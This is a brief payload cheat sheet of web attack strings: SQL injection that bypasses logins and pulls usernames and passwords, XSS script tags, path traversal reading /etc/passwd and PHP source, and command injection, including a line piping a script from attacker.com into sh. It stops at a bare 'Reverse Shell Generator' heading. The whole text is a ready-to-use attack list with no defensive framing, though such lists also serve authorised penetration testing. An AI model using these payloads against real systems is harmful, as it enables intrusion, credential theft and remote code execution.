Useful Payloads
SQL Injection
' OR '1'='1
admin'--
1' ORDER BY 1--
' UNION SELECT null, username, password FROM users--
XSS
<script>alert('xss')</script>
<svg onload=alert(1)>
<iframe src="javascript:alert('XSS')"></iframe>
LFI (Local File Inclusion)
../../../../etc/passwd
..\..\..\..\windows\win.ini
php://filter/convert.base64-encode/resource=index.php
Command Injection
127.0.0.1; whoami
& ping -c 1 evil.com
| curl http://attacker.com/shell.sh | sh
Reverse Shell Generator